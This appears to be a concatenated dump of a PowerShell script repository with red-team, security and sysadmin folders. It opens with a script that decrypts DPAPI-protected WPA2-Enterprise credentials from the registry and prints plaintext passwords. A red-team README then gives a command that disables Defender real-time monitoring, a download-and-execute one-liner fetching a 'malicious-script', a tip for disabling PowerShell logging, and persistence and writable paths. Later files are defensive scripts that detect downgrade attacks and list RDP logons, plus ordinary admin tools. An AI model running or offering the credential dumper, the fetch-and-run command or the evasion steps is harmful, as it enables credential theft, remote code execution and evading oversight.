95 | 96 | # https://github.com/ash47/EnterpriseWifiPasswordRecover 97 | [byte[]]$PasswordPattern = @(0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01) 98 | [byte[]]$UsernamePattern = @(0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00) 99 | 100 | $ProtectedFiles | ForEach-Object { 101 | # calls DPAPI UnprotectData(byte[] encrypted, byte[] entropy, out string Description) 102 | 103 | $DecryptedData = [DPAPI]::Decrypt([IO.File]::ReadAllBytes("C:\windows\temp\$_"), [Text.Encoding]::UTF8.GetBytes([String]::Empty), [ref] $NullReferenceString) 104 | 105 | $UsernameOffset = [Pattern.Search]::Locate($DecryptedData, $UsernamePattern)[0] 106 | $PasswordOffset = [Pattern.Search]::Locate($DecryptedData, $PasswordPattern)[0] 107 | 108 | # Here we will have Username and Domain 109 | $DomainAndUsername = [Text.Encoding]::UTF8.GetString((Get-String -InputStream ($DecryptedData[($UsernameOffset+8)..$PasswordOffset]))) | Out-String 110 | $EncryptedPassword = $DecryptedData[$PasswordOffset..$DecryptedData.Length] 111 | 112 | # Removes last null bytes. (No Padding will be superior to 16 bytes) 113 | foreach($i in 0..16) 114 | { 115 | $EncryptedPassword = Remove-LastNullByte -Array $EncryptedPassword 116 | } 117 | 118 | $DumpFile = "C:\windows\temp\password.bin" 119 | [IO.File]::WriteAllBytes($DumpFile, $EncryptedPassword) 120 | 121 | # SYSTEM can't decrypt password files on it's own. Now we RevertToSelf() so we are able to decrypt it. 122 | $ReversionStatus = [Revert]::RevertBack(); 123 | if($ReversionStatus -eq $false) 124 | { 125 | Write-Output "Could not revert back to user." 126 | return 127 | } 128 | 129 | # Last stage, if the line below succeeds, we have a plaintext password. 
130 | $DecryptedPassword = [Text.Encoding]::UTF8.GetString((Get-String -InputStream ([DPAPI]::Decrypt([IO.File]::ReadAllBytes($DumpFile), [Text.Encoding]::UTF8.GetBytes([String]::Empty), [ref] $NullReferenceString)))) 131 | Write-Output "Username: $DomainAndUsername" 132 | Write-Output "Password: $DecryptedPassword" 133 | } 134 | } 135 | 136 | 137 | function Remove-LastNullByte 138 | { 139 | Param( 140 | [Parameter(Mandatory = $true, Position = 0)] 141 | [byte[]]$Array, 142 | 143 | [Parameter(Mandatory = $false, Position = 1)] 144 | [byte]$Banned 145 | ) 146 | 147 | $ArrayLength = $Array.Length - 1 148 | if($Array[$ArrayLength] -eq $Banned) 149 | { 150 | return $Array[0..($ArrayLength-1)] 151 | } 152 | return $Array 153 | } 154 | 155 | <# 156 | .SYNOPSIS 157 | This file uses the registry hive HKCU to retrieve binary data 158 | that is protected by DPAPI functions to hide WPA Enterprise 159 | passwords. 160 | 161 | #> 162 | function Get-ProtectedData 163 | { 164 | [CmdletBinding()] 165 | # File Array 166 | $Files = @(); 167 | 168 | # Retrieves data to be used by DPAPI decrypt function 169 | Get-ChildItem HKCU:\Software\Microsoft\Wlansvc\UserData\Profiles\ | ForEach-Object { 170 | $currentFile = Get-TemporaryFileName 171 | $Files += $currentFile 172 | Write-Verbose "Created file $currentFile" 173 | [IO.File]::WriteAllBytes("C:\windows\temp\$currentFile", (Get-ItemProperty $_.PSPath -Name MSMUserData | Select-Object MSMUserData).MSMUserData) 174 | } 175 | 176 | return $Files 177 | } 178 | 179 | function Get-TemporaryFileName 180 | { 181 | return ([IO.Path]::GetRandomFileName()).Split(".")[0] + ".tmp" 182 | } 183 | -------------------------------------------------------------------------------- /Red Team/README.md: -------------------------------------------------------------------------------- 1 | ## Resources 2 | 3 | - [Adversary Tactics: PowerShell](https://github.com/specterops/at-ps) - Adversary Tactics - PowerShell Training 4 | - 
[AtomicTestHarnesses](https://github.com/redcanaryco/AtomicTestHarnesses) - Public Repo for Atomic Test Harness. 5 | - [Collection of tools to exploit Windows](https://github.com/Hack-with-Github/Windows) 6 | - [Get-System-Techniques](https://github.com/S3cur3Th1sSh1t/Get-System-Techniques) 7 | - [Handy powershell scripts - puckiestyle](https://github.com/puckiestyle/powershell) - Handy powershell scripts - puckiestyle 8 | - [lab-hijack](https://github.com/poptar7/lab-hijack) 9 | - [Kautilya](https://github.com/samratashok/Kautilya) - Tool for easy use of Human Interface Devices for offensive security and penetration testing. 10 | - [powerglot](https://github.com/mindcrypt/powerglot) - Powerglot encodes offensive powershell scripts using polyglots . Offensive security tool useful for stego-malware, privilege escalation, lateral movement, reverse shell, etc. 11 | - [PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell) - Run PowerShell command without invoking powershell.exe 12 | - [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) - Many usefull offensive CSharp Projects wraped into Powershell for easy usage. 13 | - [PowerShell-for-Hackers](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) - This repository is a collection of powershell functions every hacker should know 14 | - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) - Abusing Impersonation Privileges on Windows 10 and Server 2019. 15 | - [Red Baron (archived)](https://github.com/byt3bl33d3r/Red-Baron) - Automate creating resilient, disposable, secure and agile infrastructure for Red Teams. 16 | - [RestrictedAdmin](https://github.com/GhostPack/RestrictedAdmin) - Remotely enables Restricted Admin Mode 17 | - [Threat Hunting with PowerShell](https://github.com/tomwechsler/Threat_Hunting_with_PowerShell/tree/main) - Security even with a small budget - there is no excuse! 
18 | 19 | ## Active Directory 20 | - [AD_Enumeration_Hunt](https://github.com/alperenugurlu/AD_Enumeration_Hunt) - Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. 21 | 22 | ## Bypassing 23 | - [Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 24 | - [Invisi-Shell](https://github.com/OmerYa/Invisi-Shell) - Hide your Powershell script in plain sight. Bypass all Powershell security features 25 | - [PowerShdll](https://github.com/p3nt4/PowerShdll) - Run PowerShell with rundll32. Bypass software restrictions. 26 | 27 | ## Collections 28 | - [3gstudent's Homework-of-Powershell](https://github.com/3gstudent/Homework-of-Powershell) - Collection. 29 | - [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - My musings with PowerShell 30 | - [Red_Team](https://github.com/BankSecurity/Red_Team) - Some scripts useful for red team activities 31 | - [Red Team Powershell Scripts](https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts) - Various PowerShell scripts that may be useful during red team exercise 32 | - [RedRabbit](https://github.com/securethelogs/RedRabbit) - Red Team PowerShell Script 33 | 34 | ## Credential 35 | - [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) - PowerShell Pass The Hash Utils. 36 | - [Mimikatz](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security 37 | 38 | ## Defender 39 | - [disable-defender.ps1](https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1) 40 | - Disable real-time monitoring by Defender. This stops it from scanning and detecting malicious software in **realtime**. 
It will still scan in **specified intervals** or manually 41 | ````powershell 42 | Set-MpPreference -DisableRealtimeMonitoring $true 43 | ```` 44 | 45 | ## DLL and Injection 46 | - [sRDI - Shellcode Reflective DLL Injection](https://github.com/monoxgas/sRDI) - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode. 47 | - [Syringe](https://github.com/rsmusllp/syringe) - A General Purpose DLL & Code Injection Utility 48 | - [Reflective DLL Injection](https://github.com/rsmusllp/ReflectiveDLLInjection) - Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. 49 | - [Unicorn](https://github.com/trustedsec/unicorn) - Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. 50 | 51 | ## DNS 52 | - [DNSDumpsterPS](https://github.com/cottinghamd/DNSDumpsterPS/blob/master/dnsdumpster.ps1) - DNS Dumpster Query in PowerShell. 53 | - [Powermad](https://github.com/Kevin-Robertson/Powermad) - PowerShell MachineAccountQuota and DNS exploit tools. 54 | 55 | ## Encryption and Obfuscation 56 | - [Encrypt-String (in progress)](https://github.com/Am0rphous/PowerShell-Collection/blob/master/Security/Encrypt-String.ps1) 57 | - [Invoke-DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) 58 | 59 | ## Exploitation 60 | - [Malgen](https://github.com/cmsteffen-code/malgen) - Craft obfuscated, fileless PowerShell malware. 61 | 62 | ## Framewoks 63 | - [Empire](https://github.com/BC-SECURITY/Empire) - Empire is a PowerShell and Python 3.x post-exploitation framework. 64 | - [Nishang](https://github.com/samratashok/nishang) - Offensive PowerShell for red team, penetration testing and offensive security. 
65 | - [PowerSploit/byt3bl33d3r](https://github.com/byt3bl33d3r/PowerSploit) - A PowerShell Post-Exploitation Framework 66 | - [PowerSploit/PowerShellMafia](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework. 67 | - [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 68 | - [SharpView](https://github.com/tevora-threat/SharpView) - C# implementation of harmj0y's PowerView. 69 | 70 | ## Persistence 71 | - Task schedule standard storing paths 72 | ````powershell 73 | C:\Windows\System32\Tasks 74 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks 75 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree 76 | ```` 77 | 78 | ## Network 79 | - [Get-WlanEnterprisePassword](https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html) 80 | - [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy) - Socks proxy, and reverse socks server using powershell. 81 | - Reverse-shell 82 | - [PowerShell-reverse-shell](https://github.com/MartinSohn/PowerShell-reverse-shell) - Reverse TCP shell in PowerShell for fun. Made in spring 2020 with inspiration from (and a few fixes to) samratashok/nishang Invoke-PowerShellTcp.ps1 and https://cyberwardog.blogspot.com/2016/08/poweshell-encrypt-tcp-client-server.html . 83 | 84 | ## Obfuscation, evaision and stealth 85 | - Disable powershell logging by set value to `0` in `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription` 86 | - File less attacks 87 | ````powershell 88 | powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.com/malicious-script')" 89 | ```` 90 | - [Invoke-DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) - Cmd.exe Command Obfuscation Generator & Detection Test Harness. 
91 | - [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - PowerShell Obfuscator. 92 | - [NoPowerShell](https://github.com/bitsadmin/nopowershell) - PowerShell rebuilt in C# for Red Teaming purposes 93 | 94 | #### Writeable paths
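C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
--------------------------------------------------------------------------------
/Security/Check-Downgrade-Attacks.ps1:
--------------------------------------------------------------------------------
# Check for earlier events that indicate a lower PowerShell engine version was loaded.
#
# An engine older than the installed one is normally started on purpose, e.g.
#   PowerShell -Version 2 -Command <command>
# and matters because the old engine lacks script block logging, AMSI and the
# other controls of 5.x, so these events are worth reviewing.
#
# Output: the matching EventLogRecord objects from the "Windows PowerShell" log
# (Id 400, "Engine state is changed ... to Available"), unchanged, so the result
# can be piped on to Format-List, Export-Csv etc.

# Engines reporting a version below this are returned.
$MinimumEngineVersion = [Version] "5.0"

Get-WinEvent -LogName "Windows PowerShell" |
    Where-Object Id -eq 400 |
    ForEach-Object {
        # Pick the EngineVersion=x.y field out of the multi-line message instead
        # of a greedy -replace: when the field is missing, -replace hands the
        # whole message to [Version], which throws and stops the pipeline.
        $match = [regex]::Match($_.Message, 'EngineVersion=([\d\.]+)')
        if (-not $match.Success) { return }

        $version = $null
        if ([Version]::TryParse($match.Groups[1].Value, [ref] $version) -and
            $version -lt $MinimumEngineVersion) {
            $_
        }
    }
--------------------------------------------------------------------------------
/Security/Check-lower-PS-versions.ps1:
--------------------------------------------------------------------------------
# Lists every engine start recorded in the "Windows PowerShell" log (event Id
# 400) whose EngineVersion is lower than the engine running this script, with
# the time, the account and the host application / command line that started it.
# Such entries are what a deliberate downgrade (powershell.exe -version 2 ...)
# leaves behind.

# Checks if there actually exists PS logs. -Newest 1 avoids reading the whole
# log just to find out whether it has entries; a missing log raises an error,
# which is treated the same as an empty one.
$NewestEntry = $null
Try {
    $NewestEntry = Get-EventLog -LogName "Windows PowerShell" -Newest 1 -ErrorAction Stop
} Catch {
    $NewestEntry = $null
}

if ( -not $NewestEntry ) {

    Write-Host "`nAborting - no PowerShell logs found`n" -Fore Red

} Else {
    $LocalPSVersion = $PSVersionTable.PSVersion
    Write-Host "`nInstalled PowerShell version: " -NoNewline -Fore Cyan
    Write-Host $PSVersionTable.PSVersion "`n"

    # Properties of a record: Get-EventLog -LogName "Windows PowerShell" | Get-Member

    Get-WinEvent -LogName "Windows PowerShell" | Where-Object Id -eq 400 |
    Foreach-Object {

        # Skip records without a parseable EngineVersion= field rather than
        # letting the [Version] cast throw and abort the listing.
        $versionMatch = [regex]::Match($_.Message, 'EngineVersion=([\d\.]+)')
        $version = $null
        if (-not $versionMatch.Success -or
            -not [Version]::TryParse($versionMatch.Groups[1].Value, [ref] $version)) {
            return
        }

        # Formatting output to contain the command run: the HostApplication=
        # line of the message is the command line that started the engine.
        $commandMatch = [regex]::Match($_.Message, 'HostApplication=(.*)')
        $Command = if ($commandMatch.Success) { $commandMatch.Groups[1].Value.Trim() } Else { "" }

        if($version -lt $LocalPSVersion) {
            # EventLogRecord carries the account as a SID in UserId (it has no
            # UserName property); it can be empty for system-started engines.
            If ($_.UserId -eq $null) {$Username = ""} Else {$Username = $_.UserId.Value}

            Write-Host "Time: " -Fore Cyan -NoNewline; Write-Host $_.TimeCreated -NoNewline
            Write-Host " User: " -Fore Cyan -NoNewline; Write-Host $Username -NoNewline
            Write-Host " version: " -Fore Cyan -NoNewline; Write-Host $version -NoNewline
            Write-Host " Message: " -Fore Cyan -NoNewline; #Write-Host $_.Message -fore Yellow
            Write-Host "Application & command: " -Fore Cyan -NoNewline; Write-Host $Command "`n"
        }
        #Read-Host
    }

}

--------------------------------------------------------------------------------
/Security/Convert-SID-To-Username.ps1:
--------------------------------------------------------------------------------
# Resolves a SID string to its DOMAIN\user (NTAccount) name and prints it.
# Translate() throws when the SID cannot be resolved from this machine (for
# example a domain SID on a host with no line of sight to that domain); the
# error surfaces to the caller unchanged.
Function Convert-SID-To-Username($SID) {

    #$SID may be 'S-1-5-21-1924530255-1943933946-939161726-500'

    $objSID = New-Object System.Security.Principal.SecurityIdentifier($SID)
    $objUser = $objSID.Translate([System.Security.Principal.NTAccount])
    # "$objUser.Value" only expands $objUser and then prints a literal ".Value";
    # the subexpression is needed to read the property.
    Write-Host "`n Username is: $($objUser.Value)" -Fore Yellow
}
#Syntax: Convert-SID-To-Username "S-1-5-21-1924530255-1943933946-939161726-500"
--------------------------------------------------------------------------------
/Security/Encrypt-String.ps1:
--------------------------------------------------------------------------------
# Reference: https://codeforcontent.com/blog/using-aes-in-powershell/
# (a bare URL on its own line is parsed as a command name and fails when the file runs)

#Encrypt string
#Decrypt String
--------------------------------------------------------------------------------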
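/Security/List-RDP-logins.ps1:
--------------------------------------------------------------------------------
#Source code taken from: https://gallery.technet.microsoft.com/scriptcenter/Collect-RDP-logon-entries-dc3e19d0

#Usage:
# Get-OSCRDPIPaddress
# Get-OSCRDPIPaddress 129.241.1.2
# Get-OSCRDPIPaddress 127.0.0.1

#---------------------------------------------------------------------------------
#The sample scripts are not supported under any Microsoft standard support
#program or service. The sample scripts are provided AS IS without warranty
#of any kind. Microsoft further disclaims all implied warranties including,
#without limitation, any implied warranties of merchantability or of fitness for
#a particular purpose. The entire risk arising out of the use or performance of
#the sample scripts and documentation remains with you. In no event shall
#Microsoft, its authors, or anyone else involved in the creation, production, or
#delivery of the scripts be liable for any damages whatsoever (including,
#without limitation, damages for loss of business profits, business interruption,
#loss of business information, or other pecuniary loss) arising out of the use
#of or inability to use the sample scripts or documentation, even if Microsoft
#has been advised of the possibility of such damages
#---------------------------------------------------------------------------------

Function Get-OSCRDPIPaddress
{
<#
.SYNOPSIS
Lists the client IP address of RDP logons recorded in the Security log.

.DESCRIPTION
Get-OSCRDPIPaddress reads successful logon events (Id 4624) whose logon type is
10 (RemoteInteractive) and returns one object per event with ComputerName,
Time, UserName and ClientIPAddress.

.PARAMETER ComputerName
Specifies the computer on which the command runs. The default is the local computer.

.PARAMETER Credential
Specifies a user account that has permission to read that computer's Security log.

.PARAMETER Before
Lists records before the specified day.

.PARAMETER After
Lists records after the specified day.

.EXAMPLE
C:\PS> Get-OSCRDPIPaddress -Before 4/2/2013

This command lists all RDP IP address records before 4/2/2013 on the local machine.

.EXAMPLE
C:\PS> $cre = Get-Credential
C:\PS> Get-OSCRDPIPaddress -ComputerName "abcd0123" -Credential $cre -After 4/2/2013

This command lists all RDP IP address records after 4/2/2013 on computer "abcd0123".

.NOTES
Reading the Security log needs administrative (or "Event Log Readers") rights.
Only logon type 10 is reported; session reconnects (4778/4779) and RDP logons
recorded under other logon types are not, so an empty result does not prove
there were no remote sessions.
#>
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$false,Position=0)]
        [String]$ComputerName=$Env:COMPUTERNAME,
        [Parameter(Mandatory=$false,Position=1)]
        [System.Management.Automation.PsCredential]$Credential,
        [Parameter(Mandatory=$false,Position=2)]
        [Datetime]$Before,
        [Parameter(Mandatory=$false,Position=3)]
        [Datetime]$After
    )
    Try
    {
        # Build the query once and splat it, so -ComputerName is honoured with
        # and without -Credential (previously it was only passed alongside a
        # credential, and otherwise the local log was always read).
        $queryArgs = @{ FilterHashtable = @{LogName='Security'; Id=4624; Level=0} }
        If($ComputerName -ne $Env:COMPUTERNAME) { $queryArgs['ComputerName'] = $ComputerName }
        If($Credential) { $queryArgs['Credential'] = $Credential }

        # 4624 property layout: [5] TargetUserName, [8] LogonType, [18] IpAddress.
        # LogonType 10 = RemoteInteractive (RDP).
        $LogOnEvents = Get-WinEvent @queryArgs | Where-Object { $_.Properties[8].Value -eq 10 }
        If(-not $LogOnEvents) { return }

        $result = Foreach($Event in $LogOnEvents)
        {
            New-Object PSobject -Property @{
                ComputerName    = $ComputerName
                Time            = $Event.TimeCreated
                UserName        = $Event.Properties[5].value
                ClientIPAddress = $Event.Properties[18].value
            }
        }

        # An omitted [Datetime] parameter is not reliably $null (value types get
        # their default), so ask $PSBoundParameters which bounds were given and
        # leave the other side of the window open.
        $hasBefore = $PSBoundParameters.ContainsKey('Before')
        $hasAfter  = $PSBoundParameters.ContainsKey('After')
        $result | Where-Object {
            (-not $hasBefore -or $_.Time -le $Before) -and
            (-not $hasAfter  -or $_.Time -ge $After)
        }
    }
    Catch
    {
        Write-Error $_
    }

}
--------------------------------------------------------------------------------
/Security/README.md:
--------------------------------------------------------------------------------
# Security

- [Babel-Shellfish](https://github.com/OmerYa/Babel-Shellfish) - Babel-Shellfish deobfuscates and scans Powershell scripts on real-time right before each line execution.
- [Detect-Log4Shell](https://github.com/ValtteriL/Detect-Log4Shell) - Powershell script to check log files for Log4Shell exploitation
- [Generate-ComplexPassword](https://github.com/BlueTeamSteve/Generate-ComplexPassword) - Powershell script to generate a complex password.
- [PoShEvents](https://github.com/thedavecarroll/PoShEvents) - PowerShell module to query Windows Event Logs and write events with structured EventData or UserData.
- [Windows-Security-Assessment](https://github.com/haim-n/Windows-Security-Assessment) - Assess Windows OS for security misconfigurations and hardening opportunities.
--------------------------------------------------------------------------------
/SysAdmin/Check-Services.ps1:
--------------------------------------------------------------------------------
# Author: Am0rphous
# Date: 2021
# Intention: Write a primitive script that checks local services.
# This script is only halfway done
# There is a mix of norwegian words and sentences
# NOTE(review): PrepareModules installs the PendingReboot module from the
# PowerShell Gallery at run time by name only, with -Force and no version pin,
# so what gets loaded depends on whatever the gallery serves that day.


function PrepareModules {
    If ( $(Get-Module -Name "PendingReboot") -eq $null) {
        Write-Host "`n Vent litt, må bare installere noen moduler slik at alt virker i scriptet. :-)" -Fore Yellow
        Try {
            Install-Module -Name PendingReboot -Force -ErrorAction SilentlyContinue -Confirm:$False
            if ($?) {
                Import-Module PendingReboot
                If ($?) {
                    Write-Host "`nSånn! Da skal alt være i orden. Går videre.." 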
-Fore Green
                }
            }
        } Catch {
            Write-Host "`n Woops! Jeg greide ikke å installere 'PendingReboot'." -Fore Yellow
            Write-Host " Jeg kan derfor ikke sjekke om datamaskinen din trenger en restart. :-)" -fore Yellow
        }
    }
}

# Prints the machine's uptime as "<days> dager, <hours> timer, <minutes> minutter",
# computed from the WMI LastBootUpTime of Win32_OperatingSystem.
function VisOppetid {
    $OS = Get-WmiObject win32_operatingsystem
    $Oppetid = (Get-Date) - ($OS.ConvertToDateTime($OS.lastbootuptime))
    $Oppetid = "" + $Oppetid.Days + " dager, " + $Oppetid.Hours + " timer, " + $Oppetid.Minutes + " minutter"
    Write-Host " Oppetid: " -NoNewline -Fore Cyan; Write-Host $Oppetid
}

######## Services used on several servers:

#wuauserv - Windows Update
# Wrapped in its own function to format the output in a more user-friendly way.
# Prints whether the wuauserv service is running or stopped; any other state
# (e.g. StartPending) prints nothing.
Function CheckServiceWindowsUpdates {
    $WindowsUpdateService = Get-Service -Name "wuauserv"
    if ( $WindowsUpdateService.Status -eq "Stopped") {
        Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " Windows Update " -NoNewline
        Write-Host "kjører ikke" -Fore Red
    } Elseif ( $WindowsUpdateService.Status -eq "Running"){
        Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " Windows Update " -NoNewline
        Write-Host "kjører" -Fore Green
    }
}

# Checks whether a service is running; if it is stopped, tries to start it.
Function CheckService ($ServiceName) {
    If ( $(Get-Service -name $ServiceName) -eq $null) {
        Write-Host "`n Fant ikke tjenesten '$ServiceName'" -Fore Red
    } Else {
        $Service = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
        if ( $Service.Status -eq "Stopped") {
            Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline
            Write-Host " kjører ikke" -Fore Red

            Try {
                Write-Host " `n Prøver å starte tjenesten, vent litt .." 
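-Fore Yellow
                Start-Service $ServiceName; Sleep 4; #Starter tjenesten og venter 4 sekunder
                $Service.Refresh()
                if ($Service.Status -eq 'Running')  {
                    Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline
                    Write-Host " kjører" -Fore Green
                }
            } Catch {
                Write-Host "`n Woops! Det ser ut til at PowerShell ikke greide å starte tjenesten. Følgende feilmelding ble gitt: " -Fore Yellow
                Write-Host $Error
                Write-Host "`n Vi fortsetter scriptet.." -fore Green
            }
        } Elseif ( $Service.Status -eq "Running"){
            Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline
            Write-Host " kjører" -Fore Green
        }
    }
}

PrepareModules # imports, and if needed downloads and installs, the modules the script requires

Write-Host "`n ############# Statussjekk server #############" -Fore Cyan

If ( $(Test-PendingReboot -SkipConfigurationManagerClientCheck | Select -ExpandProperty IsRebootPending) -eq $true) {
    Write-Host "`n " -Fore Cyan -NoNewline; Write-Host "Server trenger å restartes!" -Fore Red
}

Write-Host "`n Statussjekk: " -NoNewline -Fore Cyan; Write-Host "Dell Workstation 1 (192.168.1.20)"
VisOppetid

Write-Host ""

# (a leftover test call `CheckService ol`, which always reported a missing service, was removed here)
CheckService "Teamviewer" # Checks whether Teamviewer is running on the machine
CheckServiceWindowsUpdates

###################### End of check of SERVER - 192.168.1.20 ######################
###########################################################################################

Write-Host ""
--------------------------------------------------------------------------------
/SysAdmin/Clean-Menu.ps1:
--------------------------------------------------------------------------------
<#
Multiple lines of info about your menu script.

Author:
Date:

To do:
#>

# Prints an error message in red, indented one tab and followed by a blank line.
# $Message defaults to $_, so the function can still be called bare from a
# Catch block, or be handed an explicit error record / string.
function CatchErrorMessage ($Message = $_) {
    # `n gives a new line
    # `t makes a tabulator space
    # 'Fore' is short for 'ForegroundColor'
    Write-Host "`t$Message`n" -Fore Red
}

# Waits for Enter; control then returns to the menu loop in LoadMenu.
# (It used to call LoadMenu again, nesting one extra menu call per selection.)
Function Prompt_reload_menu {
    Read-Host "`tPress 'enter'to go back"
}

# Returns to the menu straight away. LoadMenu loops on its own, so there is
# nothing to do here beyond returning to the caller.
Function Reload_menu_now {
}

# Shows the menu, reads a choice and runs the matching option, repeating until
# the exit option is chosen. Anything that is not a whole number between 1 and
# $LastOption re-displays the menu instead of failing the [int] cast.
Function LoadMenu {

    $nt = "`n`t`t" #Makes a new line and two tabulator spaces
    [int] $LastOption = 6 #Total number of options in the menu
    [string] $MenuBar = "`n=========== PowerShell Menu for SysAdmins ==========="

    while ($true) {
        [int] $menuOption = 0 #Resets the menuoption for each time the menu loads

        #Foreach option in the menu, the script checks if the user has chosen
        #a value less than 1 or an option greater than the last menu option.
        #If the value is outside of the menu options, the menu is shown again.
        while ( $menuOption -lt 1 -or $menuOption -gt $LastOption ) {
            Clear-Host
            Write-Host $MenuBar -Fore Magenta
            Write-Host "`n`tgithub.com/Am0rphous"
            Write-Host "$nt`Choose between these options:" -Fore Cyan
            Write-host "$nt`1. " -NoNewline -Fore Cyan; Write-Host "Option one"
            Write-host "$nt`2. " -NoNewline -Fore Cyan; Write-Host "Option two"
            Write-host "$nt`3. " -NoNewline -Fore Cyan; Write-Host "Option three"
            Write-host "$nt`4. " -NoNewline -Fore Cyan; Write-Host "Option four"
            Write-host "$nt`5. " -NoNewline -Fore Cyan; Write-Host "Option five"
            Write-host "$nt`6. " -NoNewline -Fore Cyan; Write-Host "Exit"

            #Gets input which is supposed to be an integer value from the user.
            #TryParse leaves non-numeric input as 0, which the loop condition
            #treats like any other out-of-range choice.
            $answer = Read-Host "`n`tOption"
            if (-not [int]::TryParse($answer, [ref] $menuOption)) { $menuOption = 0 }
            if ( $menuOption -lt 1 -or $menuOption -gt $LastOption ) {
                Write-Host "$nt`Please choose a number in the menu" -Fore Red
                Start-sleep 2 #Script pauses for two seconds, so the user has time to read the error message
            }

            Write-Host "" #Shows the feedback to the user one line further down
        }

        Switch ( $menuOption ) {

            1 { #Option 1 - whatever

                Try {
                    Write-Host `t"Running your code now .." `n
                    Prompt_reload_menu
                } Catch { CatchErrorMessage }

            } #Option 1 - whatever

            2 { #Option 2 - whatever

                Try {
                    Write-Host `t"Running your code now .." `n
                } Catch { CatchErrorMessage }

                Prompt_reload_menu

            } #Option 2 - whatever

            3 { #Option 3 - whatever

                Try {
                    Write-Host `t"Running your code now .." `n
                } Catch { CatchErrorMessage }

                Prompt_reload_menu

            } #Option 3 - whatever

            4 { #Option 4 - whatever

                Try {
                    Write-Host `t"Running your code now .." `n
                } Catch { CatchErrorMessage }

                Prompt_reload_menu

            } #Option 4 - whatever

            5 { #Option 5 - whatever

                Try {
                    Write-Host `t"Running your code now .." `n
                } Catch { CatchErrorMessage }

                Prompt_reload_menu

            } #Option 5 - whatever

            default { #Code to execute if option number 6 is chosen
                Write-Host "`t __________________ "
                Write-Host "`t< Good bye >"
                Write-Host "`t ------------------"
                Write-Host "`t \ ^__^"
                Write-Host "`t \ (oo)\_______"
                Write-Host "`t (__)\ )\/\"
                Write-Host "`t ||----w |"
                Write-Host "`t__v_v___v_____v_" -Fore Green -NoNewline
                Write-Host "||" -NoNewline
                Write-Host "_____" -Fore Green -NoNewline
                Write-Host "||" -NoNewline
                Write-Host "__`n" -Fore Green

                exit #Exits script

            } #Code to execute if option number 6 is chosen

        }#End switch

    }#End menu loop

}#End function

LoadMenu #Calls for the menu
--------------------------------------------------------------------------------
/SysAdmin/Connect-Shared-Folder.ps1:
--------------------------------------------------------------------------------
# Script that connects a home directory (network share)
# 31.01.19 Am0rphous

# Enter your username below
[string] $brukernavn = "navn"

# Checks whether scripts can run without changing the ExecutionPolicy.
# Compared with -eq: the earlier -match "Restricted" also matched "Unrestricted"
# and would have rewritten that policy too. RemoteSigned is enough for a local
# script like this one and keeps the signature requirement for downloaded
# scripts; Unrestricted (used before) lifted that for the whole user.
if ($(Get-ExecutionPolicy) -eq "Restricted") {
    Try {
        Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
    } Catch {
        $ErrorMessage = $_.Exception.Message # Grabs the error message if one occurs
        Write-Host $ErrorMessage # Shows the error message to the user
    }
}

# The code below fetches the path + username on the computer. The username on the
# computer may vary, so the 'general' command for the desktop path is used.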
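$DesktopPath = [Environment]::GetFolderPath("Desktop")

# The home directory server, stored as a variable
[string] $StiHjemmeKatalog = "\\home.corp.com"

# Looks for the home directory among the current SMB mappings to see whether it
# is connected already. The UNC path is escaped so its backslashes and dots are
# matched literally rather than as regex metacharacters.
$SMB_folders = Get-SmbMapping |
    Select-Object -Property RemotePath,Status |
    Where-Object -Property RemotePath -Match ([regex]::Escape($StiHjemmeKatalog)) |
    Where-Object -Property Status -eq "OK"

# Creates a desktop shortcut (.lnk) pointing at the user's home directory.
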